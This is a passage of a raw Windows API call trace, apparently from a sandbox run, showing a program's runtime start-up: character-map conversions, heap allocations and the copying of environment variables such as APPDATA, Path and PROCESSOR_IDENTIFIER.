¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿï¹p[8ç\x18", lpUsedDefaultChar=0x0) returned 256 [0216.309] GetLastError () returned 0x0 [0216.309] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0216.309] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18dd48, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0216.309] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x18e3fc, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿï¹p[8ç\x18", lpUsedDefaultChar=0x0) returned 256 [0216.330] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0216.330] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x431d5b) returned 0x4056dc [0216.530] RtlSizeHeap (HeapHandle=0x630000, Flags=0x0, MemoryPointer=0x650918) returned 0x80 [0216.555] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0216.555] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x1f) returned 0x64f370 [0216.555] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x64f370, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 31 [0216.604] GetLastError () returned 0x0 [0216.604] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x651fb0 [0216.604] RtlSizeHeap (HeapHandle=0x630000, Flags=0x0, MemoryPointer=0x651fb0) returned 0x4 [0216.604] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x651fb0, Size=0x8) returned 0x651fb0 [0216.604] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="APPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0216.604] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x36) returned 0x650bc8 [0216.604] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="APPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", cchWideChar=-1, lpMultiByteStr=0x650bc8, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="APPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", lpUsedDefaultChar=0x0) returned 54 [0216.604] GetLastError () returned 0x0 [0216.612] RtlSizeHeap (HeapHandle=0x630000, Flags=0x0, MemoryPointer=0x651fb0) returned 0x8 [0216.612] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x651fb0, Size=0xc) returned 0x651fb0 [0216.612] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 55 [0216.612] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x37) returned 0x650c08 [0216.612] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x650c08, cbMultiByte=55, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", lpUsedDefaultChar=0x0) returned 55 [0216.612] GetLastError () returned 0x0 [0216.612] RtlSizeHeap (HeapHandle=0x630000, Flags=0x0, MemoryPointer=0x651fb0) returned 0xc [0216.612] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x651fb0, Size=0x10) returned 0x651fb0 [0216.612] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0216.612] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x3c) returned 0x645a58 [0216.612] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x645a58, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", lpUsedDefaultChar=0x0) returned 60 [0216.612] GetLastError () returned 0x0 [0216.612] RtlSizeHeap (HeapHandle=0x630000, Flags=0x0, MemoryPointer=0x651fb0) returned 0x10 [0216.612] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x651fb0, Size=0x14) returned 0x651fb0 [0216.612] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramW6432=C:\\Program Files\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 49 [0216.612] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x31) returned 0x650c48 [0216.612] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramW6432=C:\\Program Files\\Common Files", cchWideChar=-1, lpMultiByteStr=0x650c48, cbMultiByte=49, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramW6432=C:\\Program Files\\Common Files", lpUsedDefaultChar=0x0) returned 49 [0216.612] GetLastError () returned 0x0 [0216.612] RtlSizeHeap (HeapHandle=0x630000, Flags=0x0, MemoryPointer=0x651fb0) returned 0x14 [0216.612] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x651fb0, Size=0x18) returned 0x651fb0 [0216.612] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="COMPUTERNAME=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0216.612] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x17) returned 0x650c88 [0216.612] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="COMPUTERNAME=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x650c88, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="COMPUTERNAME=XDUWTFONO", lpUsedDefaultChar=0x0) returned 23 [0216.612] GetLastError () returned 0x0 [0216.613] RtlSizeHeap (HeapHandle=0x630000, Flags=0x0, MemoryPointer=0x651fb0) returned 0x18 [0216.613] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x651fb0, Size=0x1c) returned 0x651fb0 [0216.613] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ComSpec=C:\\Windows\\system32\\cmd.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0216.613] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x24) returned 0x64ace0 [0216.613] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ComSpec=C:\\Windows\\system32\\cmd.exe", cchWideChar=-1, lpMultiByteStr=0x64ace0, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ComSpec=C:\\Windows\\system32\\cmd.exe", lpUsedDefaultChar=0x0) returned 36 [0216.613] GetLastError () returned 0x0 [0216.613] RtlSizeHeap (HeapHandle=0x630000, Flags=0x0, MemoryPointer=0x651fb0) returned 0x1c [0216.613] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x651fb0, Size=0x20) returned 0x651fb0 [0216.613] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="FP_NO_HOST_CHECK=NO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0216.613] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x14) returned 0x650ca8 [0216.613] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="FP_NO_HOST_CHECK=NO", cchWideChar=-1, lpMultiByteStr=0x650ca8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FP_NO_HOST_CHECK=NO", lpUsedDefaultChar=0x0) returned 20 [0216.613] GetLastError () returned 0x0 [0216.613] RtlSizeHeap (HeapHandle=0x630000, Flags=0x0, MemoryPointer=0x651fb0) returned 0x20 [0216.613] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x651fb0, Size=0x24) returned 0x651fb0 [0216.613] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEDRIVE=C:", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0216.613] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0xd) returned 0x64e948 [0216.613] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEDRIVE=C:", cchWideChar=-1, lpMultiByteStr=0x64e948, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HOMEDRIVE=C:", lpUsedDefaultChar=0x0) returned 13 [0216.613] GetLastError () returned 0x0 [0216.613] RtlSizeHeap (HeapHandle=0x630000, Flags=0x0, MemoryPointer=0x651fb0) returned 0x24 [0216.613] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x651fb0, Size=0x28) returned 0x651fb0 [0216.613] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEPATH=\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0216.613] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x25) returned 0x64ad10 [0216.613] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEPATH=\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x64ad10, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HOMEPATH=\\Users\\5p5NrGJn0jS HALPmcxz", lpUsedDefaultChar=0x0) returned 37 [0216.613] GetLastError () returned 0x0 [0216.613] RtlSizeHeap (HeapHandle=0x630000, Flags=0x0, MemoryPointer=0x651fb0) returned 0x28 [0216.614] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x651fb0, Size=0x2c) returned 0x651fb0 [0216.614] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOCALAPPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 57 [0216.614] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x39) returned 0x645aa0 [0216.614] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOCALAPPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", cchWideChar=-1, lpMultiByteStr=0x645aa0, cbMultiByte=57, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LOCALAPPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpUsedDefaultChar=0x0) returned 57 [0216.614] GetLastError () returned 0x0 [0216.614] RtlSizeHeap (HeapHandle=0x630000, Flags=0x0, MemoryPointer=0x651fb0) returned 0x2c [0216.614] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x651fb0, Size=0x30) returned 0x651fb0 [0216.614] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOGONSERVER=\\\\XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0216.614] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x18) returned 0x650cc8 [0216.614] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOGONSERVER=\\\\XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x650cc8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LOGONSERVER=\\\\XDUWTFONO", lpUsedDefaultChar=0x0) returned 24 [0216.614] GetLastError () returned 0x0 [0216.614] RtlSizeHeap (HeapHandle=0x630000, Flags=0x0, MemoryPointer=0x651fb0) returned 0x30 [0216.614] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x651fb0, Size=0x34) returned 0x650ce8 [0216.614] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NUMBER_OF_PROCESSORS=1", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0216.614] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x17) returned 0x651fb0 [0216.614] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NUMBER_OF_PROCESSORS=1", cchWideChar=-1, lpMultiByteStr=0x651fb0, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NUMBER_OF_PROCESSORS=1", lpUsedDefaultChar=0x0) returned 23 [0216.614] GetLastError () returned 0x0 [0216.614] RtlSizeHeap (HeapHandle=0x630000, Flags=0x0, MemoryPointer=0x650ce8) returned 0x34 [0216.614] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x650ce8, Size=0x38) returned 0x650ce8 [0216.614] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OS=Windows_NT", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0216.614] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0xe) returned 0x64e960 [0216.614] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OS=Windows_NT", cchWideChar=-1, lpMultiByteStr=0x64e960, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OS=Windows_NT", lpUsedDefaultChar=0x0) returned 14 [0216.614] GetLastError () returned 0x0 [0216.614] RtlSizeHeap (HeapHandle=0x630000, Flags=0x0, MemoryPointer=0x650ce8) returned 0x38 [0216.614] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x650ce8, Size=0x3c) returned 0x650ce8 [0216.614] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 105 [0216.614] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x69) returned 0x650d30 [0216.614] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", cchWideChar=-1, lpMultiByteStr=0x650d30, cbMultiByte=105, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpUsedDefaultChar=0x0) returned 105 [0216.615] GetLastError () returned 0x0 [0216.615] RtlSizeHeap (HeapHandle=0x630000, Flags=0x0, MemoryPointer=0x650ce8) returned 0x3c [0216.615] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x650ce8, Size=0x40) returned 0x650ce8 [0216.615] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0216.615] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x3e) returned 0x645ae8 [0216.615] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", cchWideChar=-1, lpMultiByteStr=0x645ae8, cbMultiByte=62, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", lpUsedDefaultChar=0x0) returned 62 [0216.615] GetLastError () returned 0x0 [0216.615] RtlSizeHeap (HeapHandle=0x630000, Flags=0x0, MemoryPointer=0x650ce8) returned 0x40 [0216.615] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x650ce8, Size=0x44) returned 0x650da8 [0216.615] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITECTURE=x86", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0216.615] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x1b) returned 0x64f398 [0216.615] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITECTURE=x86", cchWideChar=-1, lpMultiByteStr=0x64f398, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_ARCHITECTURE=x86", lpUsedDefaultChar=0x0) returned 27 [0216.615] GetLastError () returned 0x0 [0216.615] RtlSizeHeap (HeapHandle=0x630000, Flags=0x0, MemoryPointer=0x650da8) returned 0x44 [0216.615] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x650da8, Size=0x48) returned 0x650da8 [0216.615] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITEW6432=AMD64", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0216.615] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x1d) returned 0x64f3c0 [0216.615] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITEW6432=AMD64", cchWideChar=-1, lpMultiByteStr=0x64f3c0, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_ARCHITEW6432=AMD64", lpUsedDefaultChar=0x0) returned 29 [0216.615] GetLastError () returned 0x0 [0216.615] RtlSizeHeap (HeapHandle=0x630000, Flags=0x0, MemoryPointer=0x650da8) returned 0x48 [0216.615] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x650da8, Size=0x4c) returned 0x650da8 [0216.615] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 72 [0216.615] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x48) returned 0x646e80 [0216.615] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel", cchWideChar=-1, lpMultiByteStr=0x646e80, cbMultiByte=72, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel", lpUsedDefaultChar=0x0) returned 72 [0216.615] GetLastError () returned 0x0 [0216.615] RtlSizeHeap (HeapHandle=0x630000, Flags=0x0, MemoryPointer=0x650da8) returned 0x4c [0216.615] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x650da8, Size=0x50) returned 0x650da8 [0216.615] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_LEVEL=6", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, 